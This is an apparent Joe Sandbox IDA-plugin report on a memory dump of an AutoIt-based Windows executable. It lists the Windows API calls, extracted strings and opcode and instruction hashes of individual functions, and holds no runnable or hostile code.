                    • Opcode Fuzzy Hash: d0c0a32e0bec7b7d699e2edf960ac2ee5d4a630351ee4a6f6e3b0722cbd26a08
                    • Instruction Fuzzy Hash: AC313C7180411AAFCF41AFA1CC85EEEBFBAFF08300F104129F915A6265DB319956DF60
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 00706D86
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00706DC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: 342f7bab0dea7ce3b62279a1eeaa4d4669e23872f49283ebfe7cdd630b7c45c0
                    • Instruction ID: 4684b6aeea12508ec1ea281d28f91b0b8965a88920268b33b6a2ee06413ae3da
                    • Opcode Fuzzy Hash: 342f7bab0dea7ce3b62279a1eeaa4d4669e23872f49283ebfe7cdd630b7c45c0
                    • Instruction Fuzzy Hash: 0B316C71210604EEEB109F64CC90BFB77E9FF48724F108619F9A6D7190DA39AC91DB64
                    APIs
                    • _memset.LIBCMT ref: 006E2E00
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006E2E3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 6f760b5bb478bd9fea2733c027f1efdef58b74dcc893a543c5d5358b550dca49
                    • Instruction ID: 844b24da8bbce88291468e987df9866d51cb66c037aa6d82bd6f55b2df8f40fa
                    • Opcode Fuzzy Hash: 6f760b5bb478bd9fea2733c027f1efdef58b74dcc893a543c5d5358b550dca49
                    • Instruction Fuzzy Hash: 3E31F53160135AEBEB248F4AC885BEEBBBFFF05350F14406EE985962A0E7709940CB14
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007069D0
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007069DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: 0a09d90a60fe9655241d3405555a0e065579fc9df097e8d3791d515ad05959d9
                    • Instruction ID: 878e1782143af4509daaa7ef058069e309ba9060e99187fb162d52016f82702e
                    • Opcode Fuzzy Hash: 0a09d90a60fe9655241d3405555a0e065579fc9df097e8d3791d515ad05959d9
                    • Instruction Fuzzy Hash: 0211C871710208EFEF119F14CC90EBB37AEEB953A4F114329F958972D0D679AC6187A0
                    APIs
                      • Part of subcall function 00681D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00681D73
                      • Part of subcall function 00681D35: GetStockObject.GDI32(00000011), ref: 00681D87
                      • Part of subcall function 00681D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00681D91
                    • GetWindowRect.USER32(00000000,?), ref: 00706EE0
                    • GetSysColor.USER32(00000012), ref: 00706EFA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: 819d2bc8febc57c0e88b0e0c0377017bfa8a73169c6c4f25e7916fef5f6e3808
                    • Instruction ID: 25cbe91564ffb75ebb2e6c346d81a68213e6af5b7782e4c56b424e00ec56e0d6
                    • Opcode Fuzzy Hash: 819d2bc8febc57c0e88b0e0c0377017bfa8a73169c6c4f25e7916fef5f6e3808
                    • Instruction Fuzzy Hash: 2921597261020AEFDB04DFA8CC45AFA7BF8FB08314F004629F955D3290E738E8619B50
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 00706C11
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00706C20
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: d7b20f9e308988e57fb90f4bf8e70b2cb6e9c474b168e275fbaeae535f7903ee
                    • Instruction ID: 40994c78f617b4fc58b2c7fcc8575bddc85258784e7e7bfbbcd68d09f1094645
                    • Opcode Fuzzy Hash: d7b20f9e308988e57fb90f4bf8e70b2cb6e9c474b168e275fbaeae535f7903ee
                    • Instruction Fuzzy Hash: 16119DB1100208EBEB108E649C55ABB37A9EB05378F204724F961D71E0C779ECA19B60
                    APIs
                    • _memset.LIBCMT ref: 006E2F11
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006E2F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 08e552ff67213cbdccbe42e3b1c0acfb410372e929001d197e711e12464dedcf
                    • Instruction ID: 1f5a4befcc78f8668e2d04b5e8cc6766ef63d296d7fbfc1d555dea83d4ca833c
                    • Opcode Fuzzy Hash: 08e552ff67213cbdccbe42e3b1c0acfb410372e929001d197e711e12464dedcf
                    • Instruction Fuzzy Hash: 561122319423A6ABCB20DB59DD14BDD73BFEB02300F0840B6E800A73A0D7B0AD06C795
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006F2520
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 006F2549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: e77bf735a61e7ae59e1671486e5c82a272feabb489c0ec338634f5ace9e8b0df
                    • Instruction ID: 8cb6bc134b0964e0c352b329c012aa7116a2b327e650c20f665b54a86ce96f6e
                    • Opcode Fuzzy Hash: e77bf735a61e7ae59e1671486e5c82a272feabb489c0ec338634f5ace9e8b0df
                    • Instruction Fuzzy Hash: 2C11E3B010122ABADB248F51CCA5EFBFFA9FF05351F10812AF60546140D2705981DEF1
                    APIs
                      • Part of subcall function 006F830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,006F80C8,?,00000000,?,?), ref: 006F8322
                    • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006F80CB
                    • htons.WSOCK32(00000000,?,00000000), ref: 006F8108
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidehtonsinet_addr
                    • String ID: 255.255.255.255
                    • API String ID: 2496851823-2422070025
                    • Opcode ID: eb9581f4ee9c03ed9c7a582466c2985a7ff8c9d77f97cfe056fba278853fbeb3
                    • Instruction ID: 42adc73fbad1fda5b05d27614f56abc3d99d8abae18e2f151fdc9c48ab33c3d4
                    • Opcode Fuzzy Hash: eb9581f4ee9c03ed9c7a582466c2985a7ff8c9d77f97cfe056fba278853fbeb3
                    • Instruction Fuzzy Hash: 85118275600209ABDB20EF64CC46FFDB366EF14314F10866BEA1197391DE71A8158799
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 006DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006DB0E7
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006D9355
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 3722b70689f96af5e46b0b8b5ada1b2fed56ab7448f63f2c778aedf365cd0f08
                    • Instruction ID: 74cbed4a3a610e46a71a4818d8b1ff8cd863a5db384cb10f627b55c7e2e6c68d
                    • Opcode Fuzzy Hash: 3722b70689f96af5e46b0b8b5ada1b2fed56ab7448f63f2c778aedf365cd0f08
                    • Instruction Fuzzy Hash: 45019E71A05214ABCB18FBA4CC918FE77AABF06720B15071AFA32573D2DB3599089764
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 006DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006DB0E7
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 006D924D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: c5de01d0a2caee534f4c139f5f139a3c1e4174aac24eba8defca8b942e732017
                    • Instruction ID: 88be6625644f2fa1f49f4442f251344e964f71cd4219e4973905fba80aab7ae8
                    • Opcode Fuzzy Hash: c5de01d0a2caee534f4c139f5f139a3c1e4174aac24eba8defca8b942e732017
                    • Instruction Fuzzy Hash: 79018475E41208BBCB58FBA0C992DFF73AA9F15700F24011ABA12673C2EA159F189675
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 006DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006DB0E7
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 006D92D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 6916343d7bf148133d00cb2b859111871e03c276c2968d4942d46fe78da7d12b
                    • Instruction ID: 6c600166485450a3bd75fae8c6eb039aa7e986cb562f3a9db6d0bc4bb41e9a46
                    • Opcode Fuzzy Hash: 6916343d7bf148133d00cb2b859111871e03c276c2968d4942d46fe78da7d12b
                    • Instruction Fuzzy Hash: 8B01A771E41204B7DB14FAA4C982DFF77AE9F11700F24021AB912633C2DB259F089275
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __calloc_crt
                    • String ID: @Rt
                    • API String ID: 3494438863-1346297377
                    • Opcode ID: f238e8f7228eeca4961dec8d2a2cdb62824d0dfee186e48ce8b926095656c8cf
                    • Instruction ID: 5191442912b9a56d4f3fb797df8ae177136b6ca0cf0ef247ef2aa46d2ec76567
                    • Opcode Fuzzy Hash: f238e8f7228eeca4961dec8d2a2cdb62824d0dfee186e48ce8b926095656c8cf
                    • Instruction Fuzzy Hash: A5F0A475348716ABF764BB28FD016912796FB03364F14402BF200CB291EB788C414A59
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: 7b7539e976bbe9835d71b0aa6da1172bcba376391c917714eec669e4ff93d096
                    • Instruction ID: d2391fbe1692fc9dec28112c6520809b4fd1d1382904d907ca6d264f4adee46e
                    • Opcode Fuzzy Hash: 7b7539e976bbe9835d71b0aa6da1172bcba376391c917714eec669e4ff93d096
                    • Instruction Fuzzy Hash: 24E0617390032C2BE720AA959C05F97F7ACEB41731F00015BFD10D3140E6649A448BD5
                    APIs
                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006D81CA
                      • Part of subcall function 006A3598: _doexit.LIBCMT ref: 006A35A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Message_doexit
                    • String ID: AutoIt$Error allocating memory.
                    • API String ID: 1993061046-4017498283
                    • Opcode ID: 3e9b4698c95a2266137b3f66d38a0062db9c7b66f4ecee00600fa0c41e7f8e36
                    • Instruction ID: 98676125ae88f2d7cb73fc2fa9111c4c57f667121f207e1865a36d74db477584
                    • Opcode Fuzzy Hash: 3e9b4698c95a2266137b3f66d38a0062db9c7b66f4ecee00600fa0c41e7f8e36
                    • Instruction Fuzzy Hash: FBD05B723C536936D25537A86C0BFC675494B16B51F00401AFB085A6D38DD699D142ED
                    APIs
                      • Part of subcall function 006BB564: _memset.LIBCMT ref: 006BB571
                      • Part of subcall function 006A0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006BB540,?,?,?,0068100A), ref: 006A0B89
                    • IsDebuggerPresent.KERNEL32(?,?,?,0068100A), ref: 006BB544
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0068100A), ref: 006BB553
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006BB54E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: 1ca2d510e1cb51f1e05589e36f48e6d958e1fcace4ec63401114b30e2ad7ea9d
                    • Instruction ID: 79b02d071783b53a3a10a0181153c8466521dd00c5de0c92c0b68e45b11684c5
                    • Opcode Fuzzy Hash: 1ca2d510e1cb51f1e05589e36f48e6d958e1fcace4ec63401114b30e2ad7ea9d
                    • Instruction Fuzzy Hash: B7E06DB16003118FD370EF28E5083827BE0AF00714F008A2DE446C2651DBF8E848CB66